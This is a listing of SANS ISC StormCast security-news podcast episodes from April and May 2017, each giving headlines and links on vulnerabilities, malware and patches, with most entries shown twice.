WannaCry Malware Links Latest updates see https://isc.sans.edu Webcast: https://www.sans.org/webcasts/special-webcast-wannacry-ransomeware-threat-105160 PowerPoint: https://isc.sans.edu/presentations/WannaCry.ppt
5/15/20177 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, May 12th 2017

Conexant Audio Drivers Log Keystrokes; https://www.modzero.ch/modlog/archives/2017/05/11/en_keylogger_in_hewlett-packard_audio_driver/index.html Rig Exploit Kit Used to Send Ramnit Trojan https://isc.sans.edu/forums/diary/Seamless+Campaign+using+Rig+Exploit+Kit+to+send+Ramnit+Trojan/22404/ Encase Forensic Imager Exploit http://blog.sec-consult.com/2017/05/chainsaw-of-custody-manipulating.html
5/12/201713 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, May 12th 2017

Conexant Audio Drivers Log Keystrokes; https://www.modzero.ch/modlog/archives/2017/05/11/en_keylogger_in_hewlett-packard_audio_driver/index.html Rig Exploit Kit Used to Send Ramnit Trojan https://isc.sans.edu/forums/diary/Seamless+Campaign+using+Rig+Exploit+Kit+to+send+Ramnit+Trojan/22404/ Encase Forensic Imager Exploit http://blog.sec-consult.com/2017/05/chainsaw-of-custody-manipulating.html
5/12/201713 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, May 11th 2017

How to Review OAUTH Application Permissions for Popular Sites https://isc.sans.edu/forums/diary/OAuth+and+Its+High+Time+for+Some+Personal+SecurityScaping+Today/22400/ Apple Working on Firmware Integrity Check http://apple.stackexchange.com/questions/282028/pop-up-firmware-changes-detected-randomly-appear Panda Mobile Anti Malware Releases Patch for Evilgrade Bug https://www.contextis.com/resources/blog/exploiting-vulnerable-pandas/ ASUS RT Router Vulnerabilities https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/ Microsoft Edge SOP Bypass https://www.brokenbrowser.com/sop-bypass-uxss-stealing-credentials-pretty-fast/ Linux Kernel Packet Socket Vulnerability Exploit https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
5/11/20178 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, May 11th 2017

How to Review OAUTH Application Permissions for Popular Sites https://isc.sans.edu/forums/diary/OAuth+and+Its+High+Time+for+Some+Personal+SecurityScaping+Today/22400/ Apple Working on Firmware Integrity Check http://apple.stackexchange.com/questions/282028/pop-up-firmware-changes-detected-randomly-appear Panda Mobile Anti Malware Releases Patch for Evilgrade Bug https://www.contextis.com/resources/blog/exploiting-vulnerable-pandas/ ASUS RT Router Vulnerabilities https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/ Microsoft Edge SOP Bypass https://www.brokenbrowser.com/sop-bypass-uxss-stealing-credentials-pretty-fast/ Linux Kernel Packet Socket Vulnerability Exploit https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
5/11/20178 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, May 10th 2017

Microsoft Path Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+and+Adobe/22396/ Snake For Mac OS X Included in Handbrake https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/ Cisco Patches CMP-Telnet Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp WolfSSL Library X.509 Certificate Text Parsing Code Execution Vulnerability http://blog.talosintelligence.com/2017/05/wolfssl-x509-vuln.html
5/9/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, May 10th 2017

Microsoft Path Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+and+Adobe/22396/ Snake For Mac OS X Included in Handbrake https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/ Cisco Patches CMP-Telnet Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp WolfSSL Library X.509 Certificate Text Parsing Code Execution Vulnerability http://blog.talosintelligence.com/2017/05/wolfssl-x509-vuln.html
5/9/20175 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, May 9th 2017

Exploring a P2P Transient Botnet - From Discovery to Enumeration https://isc.sans.edu/forums/diary/Exploring+a+P2P+Transient+Botnet+From+Discovery+to+Enumeration/22392/ Video Conversion Application Handbrake Compromised https://forum.handbrake.fr/viewtopic.php?f=33&t=36364 Emergency Update for Microsoft Malware Protection Engine https://technet.microsoft.com/en-us/library/security/4022344 OS X Keychain OTR Vulnerability https://medium.com/@longtermsec/bypassing-otr-signature-verification-to-steal-icloud-keychain-secrets-9e92ab55b605
5/9/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, May 9th 2017

Exploring a P2P Transient Botnet - From Discovery to Enumeration https://isc.sans.edu/forums/diary/Exploring+a+P2P+Transient+Botnet+From+Discovery+to+Enumeration/22392/ Video Conversion Application Handbrake Compromised https://forum.handbrake.fr/viewtopic.php?f=33&t=36364 Emergency Update for Microsoft Malware Protection Engine https://technet.microsoft.com/en-us/library/security/4022344 OS X Keychain OTR Vulnerability https://medium.com/@longtermsec/bypassing-otr-signature-verification-to-steal-icloud-keychain-secrets-9e92ab55b605
5/9/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, May 8th 2017

Tenable Discovers Details Regarding Intel AMT Vulnerability http://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability Android Apps Use Ultrasound Beacons To Track Users http://christian.wressnegger.info/content/projects/sidechannels/2017-eurosp.pdf HTTP Headers... the Achilles' Heel of Many Applications https://isc.sans.edu/forums/diary/HTTP+Headers+the+Achilles+heel+of+many+applications/22382/
5/7/20176 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, May 8th 2017

Tenable Discovers Details Regarding Intel AMT Vulnerability http://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability Android Apps Use Ultrasound Beacons To Track Users http://christian.wressnegger.info/content/projects/sidechannels/2017-eurosp.pdf HTTP Headers... the Achilles' Heel of Many Applications https://isc.sans.edu/forums/diary/HTTP+Headers+the+Achilles+heel+of+many+applications/22382/
5/7/20176 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, May 5th 2017

Google OAUTH Spam Wrapup https://threatpost.com/1-million-gmail-users-impacted-by-google-docs-phishing-attack/125436/ Artificial Master Fingerprint Set https://wp.nyu.edu/memon/the-master-print/ rpcbind denial of service https://guidovranken.wordpress.com/2017/05/03/rpcbomb-remote-rpcbind-denial-of-service-patches/ Debian Discontinue FTP Support for Downloads https://www.debian.org/News/2017/20170425
5/5/20175 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, May 5th 2017

Google OAUTH Spam Wrapup https://threatpost.com/1-million-gmail-users-impacted-by-google-docs-phishing-attack/125436/ Artificial Master Fingerprint Set https://wp.nyu.edu/memon/the-master-print/ rpcbind denial of service https://guidovranken.wordpress.com/2017/05/03/rpcbomb-remote-rpcbind-denial-of-service-patches/ Debian Discontinue FTP Support for Downloads https://www.debian.org/News/2017/20170425
5/5/20175 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, May 4th 2017

Google Docs OAUTH Phishing E-Mails https://isc.sans.edu/forums/diary/OAUTH+phishing+against+Google+Docs+beware/22372/ Review Google App Permissions https://myaccount.google.com/u/0/permissions?pli=1 SS7 Exploits Documented in Banking Attacks http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504 http://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/
5/3/20178 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, May 4th 2017

Google Docs OAUTH Phishing E-Mails https://isc.sans.edu/forums/diary/OAUTH+phishing+against+Google+Docs+beware/22372/ Review Google App Permissions https://myaccount.google.com/u/0/permissions?pli=1 SS7 Exploits Documented in Banking Attacks http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504 http://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/
5/3/20178 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, May 3rd 2017

Scans Sighted for Ports Used by Intel Remote Management Interface https://isc.sans.edu/port.html?port=16992 https://isc.sans.edu/port.html?port=16993 Outlook Forms Can Run Macros https://sensepost.com/blog/2017/outlook-forms-and-shells/ Jenkins Vulnerability https://jenkins.io/security/advisory/2017-04-26/ Google Android May Patchday https://source.android.com/security/bulletin/2017-05-01 IBM Storwize USB Stick Malware http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E
5/2/20175 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, May 3rd 2017

Scans Sighted for Ports Used by Intel Remote Management Interface https://isc.sans.edu/port.html?port=16992 https://isc.sans.edu/port.html?port=16993 Outlook Forms Can Run Macros https://sensepost.com/blog/2017/outlook-forms-and-shells/ Jenkins Vulnerability https://jenkins.io/security/advisory/2017-04-26/ Google Android May Patchday https://source.android.com/security/bulletin/2017-05-01 IBM Storwize USB Stick Malware http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E
5/2/20175 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, May 2nd 2017

Intel AMT, SBT and ISM Escalation of Privilege Vulnerability https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr https://semiaccurate.com/2017/05/01/remote-security-exploit-2008-intel-platforms/ Local Root Exploit in chkrootkit https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/ Escape Sequence Exploits in Various Linux Terminals http://www.openwall.com/lists/oss-security/2017/05/01/13
5/2/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, May 2nd 2017

Intel AMT, SBT and ISM Escalation of Privilege Vulnerability https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr https://semiaccurate.com/2017/05/01/remote-security-exploit-2008-intel-platforms/ Local Root Exploit in chkrootkit https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/ Escape Sequence Exploits in Various Linux Terminals http://www.openwall.com/lists/oss-security/2017/05/01/13
5/2/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, May 1st 2017

Simple Javascript Word Macro Not Recognized By Many AV Products https://isc.sans.edu/forums/diary/Another+Day+Another+Obfuscation+Technique/22354/ OS X Malware Adds Proxy To Intercept HTTPS http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/ OVH Vulnerability Put Servers at Risk https://jrwr.io/doku.php?id=blog:ovh_vrack_security_issue
5/1/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, May 1st 2017

Simple Javascript Word Macro Not Recognized By Many AV Products https://isc.sans.edu/forums/diary/Another+Day+Another+Obfuscation+Technique/22354/ OS X Malware Adds Proxy To Intercept HTTPS http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/ OVH Vulnerability Put Servers at Risk https://jrwr.io/doku.php?id=blog:ovh_vrack_security_issue
5/1/20175 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, April 28th 2017

VISA IP Block Hijacked By Russian ISP https://isc.sans.edu/forums/diary/BGP+Hijacking+The+Internet+is+StillAgain+Broken/22350/ Antminer "Checking" DoS Vulnerability http://www.antbleed.com Symantec Offers Audits To Stave Off Google's CA Blacklisting https://www.symantec.com/connect/blogs/symantec-ca-proposal NoMX Security E-Mail Appliance Pentest https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/ vendor response: www.nomx.com SANS Defending Web Applications https://www.sans.org/dev522
4/28/20176 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, April 28th 2017

VISA IP Block Hijacked By Russian ISP https://isc.sans.edu/forums/diary/BGP+Hijacking+The+Internet+is+StillAgain+Broken/22350/ Antminer "Checking" DoS Vulnerability http://www.antbleed.com Symantec Offers Audits To Stave Off Google's CA Blacklisting https://www.symantec.com/connect/blogs/symantec-ca-proposal NoMX Security E-Mail Appliance Pentest https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/ vendor response: www.nomx.com SANS Defending Web Applications https://www.sans.org/dev522
4/28/20176 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, April 27th 2017

Bots Disrupts US ISP https://www.bleepingcomputer.com/news/security/us-isp-goes-down-as-two-malware-families-go-to-war-over-its-modems/ Samsung Smart TV Wi-Fi Direct Exploit http://seclists.org/fulldisclosure/2017/Apr/101 Adobe Publishes ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html SNMP Misconfiguration Eliminates Community String Validation https://stringbleed.github.io/#
4/27/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, April 27th 2017

Bots Disrupts US ISP https://www.bleepingcomputer.com/news/security/us-isp-goes-down-as-two-malware-families-go-to-war-over-its-modems/ Samsung Smart TV Wi-Fi Direct Exploit http://seclists.org/fulldisclosure/2017/Apr/101 Adobe Publishes ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html SNMP Misconfiguration Eliminates Community String Validation https://stringbleed.github.io/#
4/27/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, April 26th 2017

CAA Records and Certificate Issuance https://isc.sans.edu/forums/diary/CAA+Records+and+Certificate+Issuance/22342/ Hyundai Blue Link Infomration Disclosure https://community.rapid7.com/community/infosec/blog/2017/04/25/r7-2017-02-hyundai-blue-link-potential-info-disclosure-fixed HP, Philips, Fujitsu Display Software Privilege Escalation http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html
4/26/20175 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, April 26th 2017

CAA Records and Certificate Issuance https://isc.sans.edu/forums/diary/CAA+Records+and+Certificate+Issuance/22342/ Hyundai Blue Link Infomration Disclosure https://community.rapid7.com/community/infosec/blog/2017/04/25/r7-2017-02-hyundai-blue-link-potential-info-disclosure-fixed HP, Philips, Fujitsu Display Software Privilege Escalation http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html
4/26/20175 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, April 25th 2017

Android Malware MilyDoor Builds Backdoor Into Networks Via SSH/SOCKS http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-android-malware-finds-successor-milkydoor/ Remote Code Execution Flaw in Squirrelmail http://seclists.org/fulldisclosure/2017/Apr/81 Atlassian Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2017-04-19-887071137.html TCP Proxy Over Named Pipes / SMB https://github.com/dxflatline/flatpipes
4/25/20175 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, April 25th 2017

Android Malware MilyDoor Builds Backdoor Into Networks Via SSH/SOCKS http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-android-malware-finds-successor-milkydoor/ Remote Code Execution Flaw in Squirrelmail http://seclists.org/fulldisclosure/2017/Apr/81 Atlassian Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2017-04-19-887071137.html TCP Proxy Over Named Pipes / SMB https://github.com/dxflatline/flatpipes
4/25/20175 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, April 24th 2017

Increase in Port 81 Traffic https://isc.sans.edu/forums/diary/WTF+tcp+port+81/22332/ Analyzing a Document and Malware Trying to Exploit CVE-2017-0199 (HTA) https://isc.sans.edu/forums/diary/Malicious+Documents+A+Bit+Of+News/22334/ DOUBLEPULSAR Detected on Tens of Thousands of Systems http://www.theregister.co.uk/2017/04/21/windows_hacked_nsa_shadow_brokers/ NVidia Includes Node.js Server With Drivers http://blog.sec-consult.com/2017/04/application-whitelisting-application.html Android SMSVova Spyware Survives in Google Play Store for 3 Years https://www.zscaler.com/blogs/research/android-spyware-smsvova-posing-system-update-play-store
4/24/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, April 24th 2017

Increase in Port 81 Traffic https://isc.sans.edu/forums/diary/WTF+tcp+port+81/22332/ Analyzing a Document and Malware Trying to Exploit CVE-2017-0199 (HTA) https://isc.sans.edu/forums/diary/Malicious+Documents+A+Bit+Of+News/22334/ DOUBLEPULSAR Detected on Tens of Thousands of Systems http://www.theregister.co.uk/2017/04/21/windows_hacked_nsa_shadow_brokers/ NVidia Includes Node.js Server With Drivers http://blog.sec-consult.com/2017/04/application-whitelisting-application.html Android SMSVova Spyware Survives in Google Play Store for 3 Years https://www.zscaler.com/blogs/research/android-spyware-smsvova-posing-system-update-play-store
4/24/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, April 21st 2017

Detecting Covert DNS Channels https://isc.sans.edu/forums/diary/DNS+Query+Length+Because+Size+Does+Matter/22326/ Ambient Light Sensors May Become Accessible Via JavaScript https://blog.lukaszolejnik.com/stealing-sensitive-browser-data-with-the-w3c-ambient-light-sensor-api/ BIND Name Server Update https://kb.isc.org/article/AA-01491 Entropy As A Service https://www.getnetrandom.com Webcast: NoSQL Doesn't Make You NoVulnerable https://www.sans.org/webcasts/nosql-doesnt-novulnerable-104897
4/20/20175 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, April 21st 2017

Detecting Covert DNS Channels https://isc.sans.edu/forums/diary/DNS+Query+Length+Because+Size+Does+Matter/22326/ Ambient Light Sensors May Become Accessible Via JavaScript https://blog.lukaszolejnik.com/stealing-sensitive-browser-data-with-the-w3c-ambient-light-sensor-api/ BIND Name Server Update https://kb.isc.org/article/AA-01491 Entropy As A Service https://www.getnetrandom.com Webcast: NoSQL Doesn't Make You NoVulnerable https://www.sans.org/webcasts/nosql-doesnt-novulnerable-104897
4/20/20175 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, April 20th 2017

Hunting and Analyzing Malicious Excel Files https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Excel+Sheets/22322/ Bose May Be Spying on Listeners https://www.scribd.com/document/345620278/Bose-Privacy-Complaint Microsoft No-Password Sign In https://blogs.technet.microsoft.com/enterprisemobility/2017/04/18/no-password-phone-sign-in-for-microsoft-accounts/ Owncloud/Nextcloud Bug Reports Include Passwords https://blog.hboeck.de/archives/885-Passwords-in-the-Bug-Reports-OwncloudNextcloud.html Fuzzing Used to Find a Tcpdump Vulnerability https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ DNS Homograph Detection https://github.com/dutchcoders/homographs For Friday's (and other upcoming webcasts), see https://www.sans.org/webcasts
4/20/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, April 20th 2017

Hunting and Analyzing Malicious Excel Files https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Excel+Sheets/22322/ Bose May Be Spying on Listeners https://www.scribd.com/document/345620278/Bose-Privacy-Complaint Microsoft No-Password Sign In https://blogs.technet.microsoft.com/enterprisemobility/2017/04/18/no-password-phone-sign-in-for-microsoft-accounts/ Owncloud/Nextcloud Bug Reports Include Passwords https://blog.hboeck.de/archives/885-Passwords-in-the-Bug-Reports-OwncloudNextcloud.html Fuzzing Used to Find a Tcpdump Vulnerability https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ DNS Homograph Detection https://github.com/dutchcoders/homographs For Friday's (and other upcoming webcasts), see https://www.sans.org/webcasts
4/20/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, April 19th 2017

Details about how to exploit CVE-2017-0199 https://rewtin.blogspot.com.au/2017/04/cve-2017-0199-practical-exploitation-poc.html User Provided Patch To Help Update Old Operating Systems on New CPU https://github.com/zeffy/kb4012218-19 Forensics Tools and Issues With Windows 10 Compact OS https://www.heise.de/security/artikel/Forensik-Tools-patzen-bei-neuer-Windows-Kompression-3676075.html
4/19/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, April 19th 2017

Details about how to exploit CVE-2017-0199 https://rewtin.blogspot.com.au/2017/04/cve-2017-0199-practical-exploitation-poc.html User Provided Patch To Help Update Old Operating Systems on New CPU https://github.com/zeffy/kb4012218-19 Forensics Tools and Issues With Windows 10 Compact OS https://www.heise.de/security/artikel/Forensik-Tools-patzen-bei-neuer-Windows-Kompression-3676075.html
4/19/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, April 18th 2017

Detecting IDN Phishing Domains https://isc.sans.edu/forums/diary/Tool+to+Detect+Active+Phishing+Attacks+Using+Unicode+LookAlike+Domains/22310/ Old Linux Kernel Bug Allows for Remote Code Execution via UDP https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191 Microsoft Edge JavaScript "fetch" Function Can Be Used to Leak User Data http://mov.sx/2017/04/16/microsoft-edge-leaks-url.html
4/18/20177 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, April 18th 2017

Detecting IDN Phishing Domains https://isc.sans.edu/forums/diary/Tool+to+Detect+Active+Phishing+Attacks+Using+Unicode+LookAlike+Domains/22310/ Old Linux Kernel Bug Allows for Remote Code Execution via UDP https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191 Microsoft Edge JavaScript "fetch" Function Can Be Used to Leak User Data http://mov.sx/2017/04/16/microsoft-edge-leaks-url.html
4/18/20177 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, April 17th 2017

Detecting SMB Cover Channel "Doublepulsar" https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/ ETERNALBLUE: Windows SMBv1 Exploit https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
4/17/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, April 17th 2017

Detecting SMB Cover Channel "Doublepulsar" https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/ ETERNALBLUE: Windows SMBv1 Exploit https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
4/17/20175 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, April 14th 2017

Packet Captures Filtered By Process https://isc.sans.edu/forums/diary/Packet+Captures+Filtered+by+Process/22296/ C-LDAP Used to Amplify DDoS Attack https://isc.sans.edu/forums/diary/Akamai+reports+UDP+DDOS+Using+CLDAP+reaching+24Gbps/22300/ Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES SAP Patches Code Injection in TREX https://erpscan.com/press-center/press-release/critical-vulnerability-affects-sap-hana-dozen-sap-applications/ More Details About Dallas Siren Hack https://duo.com/blog/the-dallas-county-siren-hack
4/14/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, April 14th 2017

Packet Captures Filtered By Process https://isc.sans.edu/forums/diary/Packet+Captures+Filtered+by+Process/22296/ C-LDAP Used to Amplify DDoS Attack https://isc.sans.edu/forums/diary/Akamai+reports+UDP+DDOS+Using+CLDAP+reaching+24Gbps/22300/ Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES SAP Patches Code Injection in TREX https://erpscan.com/press-center/press-release/critical-vulnerability-affects-sap-hana-dozen-sap-applications/ More Details About Dallas Siren Hack https://duo.com/blog/the-dallas-county-siren-hack
4/14/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, April 13th 2017

Mole Ransomware Delivered via Fake USPS E-Mails https://isc.sans.edu/forums/diary/Malspam+on+20170411+pushes+yet+another+ransomware+variant/22290/ Identifying HTTPS-Protected Netflix Videos in Real-Time https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf SMS Messages Used to Control Oven https://www.pentestpartners.com/blog/iot-Aga-cast-iron-security-flaw/ Android Hardening TLS Use https://android-developers.googleblog.com/2017/04/android-o-to-drop-insecure-tls-version.html
4/13/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, April 13th 2017

Mole Ransomware Delivered via Fake USPS E-Mails https://isc.sans.edu/forums/diary/Malspam+on+20170411+pushes+yet+another+ransomware+variant/22290/ Identifying HTTPS-Protected Netflix Videos in Real-Time https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf SMS Messages Used to Control Oven https://www.pentestpartners.com/blog/iot-Aga-cast-iron-security-flaw/ Android Hardening TLS Use https://android-developers.googleblog.com/2017/04/android-o-to-drop-insecure-tls-version.html
4/13/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, April 12th 2017

MSFT/Adobe Patch Tuesday https://isc.sans.edu/forums/diary/April+2017+Microsoft+Patch+Tuesday/22288/ Solaris 0-Day https://twitter.com/hackerfantastic/status/851555538597011460 OWASP Top 10 Update https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf
4/12/20175 hours
Episode Artwork

ISC StormCast for Wednesday, April 12th 2017

MSFT/Adobe Patch Tuesday https://isc.sans.edu/forums/diary/April+2017+Microsoft+Patch+Tuesday/22288/ Solaris 0-Day https://twitter.com/hackerfantastic/status/851555538597011460 OWASP Top 10 Update https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf
4/12/20175 hours
Episode Artwork

ISC StormCast for Tuesday, April 11th 2017

TPLink Modem Responds With Admin Password to SMS http://www.theregister.co.uk/2017/04/10/tplink_3gwifi_modem_spills_credentials_to_an_evil_text_message/ Fake Google Map Weblinks https://www.bleepingcomputer.com/news/google/thousands-of-fake-google-maps-listings-redirect-users-to-fraudulent-sites-each-month/ Apple Fixes Apple Music For Android http://seclists.org/bugtraq/2017/Apr/26 Dalles Sirens Hacked via Wireless Attacks http://www.theregister.co.uk/2017/04/10/hackers_set_off_dallas_emergency_siren_system/ NATO Discovers (finally?) that IPv6 Can be Used As a Covert Channel https://t.co/FvSSwhtUH7
4/11/20175 hours
Episode Artwork

ISC StormCast for Tuesday, April 11th 2017

TPLink Modem Responds With Admin Password to SMS http://www.theregister.co.uk/2017/04/10/tplink_3gwifi_modem_spills_credentials_to_an_evil_text_message/ Fake Google Map Weblinks https://www.bleepingcomputer.com/news/google/thousands-of-fake-google-maps-listings-redirect-users-to-fraudulent-sites-each-month/ Apple Fixes Apple Music For Android http://seclists.org/bugtraq/2017/Apr/26 Dalles Sirens Hacked via Wireless Attacks http://www.theregister.co.uk/2017/04/10/hackers_set_off_dallas_emergency_siren_system/ NATO Discovers (finally?) that IPv6 Can be Used As a Covert Channel https://t.co/FvSSwhtUH7
4/11/20175 hours
Episode Artwork

ISC StormCast for Monday, April 10th 2017

Domain Whitelisting with Alexa and Umbrella Lists (and update) https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists/22270/ https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists+update/22274/ SANS Security West (San Diego) https://www.sans.org/event/sans-security-west-2017 Dallas Tornado Sirens Hacked https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/?utm_term=.ca706deea318 Shadowbroker Files https://github.com/x0rz/EQGRP Word Vulnerability https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
4/10/20175 hours
Episode Artwork

ISC StormCast for Monday, April 10th 2017

Domain Whitelisting with Alexa and Umbrella Lists (and update) https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists/22270/ https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists+update/22274/ SANS Security West (San Diego) https://www.sans.org/event/sans-security-west-2017 Dallas Tornado Sirens Hacked https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/?utm_term=.ca706deea318 Shadowbroker Files https://github.com/x0rz/EQGRP Word Vulnerability https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
4/10/20175 hours
Episode Artwork

ISC StormCast for Friday, April 7th 2017

Automatically Inferring Malware Signatures for Anti-Virus Assisted Attacks https://www.sec.cs.tu-bs.de/pubs/2017-asiaccs.pdf Cisco Aironet Default Credentials https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170405-ame Intercepting Two-Factor Authentication https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/ QNAP NAS Vulnerabilities https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
4/7/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, April 7th 2017

Automatically Inferring Malware Signatures for Anti-Virus Assisted Attacks https://www.sec.cs.tu-bs.de/pubs/2017-asiaccs.pdf Cisco Aironet Default Credentials https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170405-ame Intercepting Two-Factor Authentication https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/ QNAP NAS Vulnerabilities https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
4/7/20175 minutes, 40 seconds
Episode Artwork

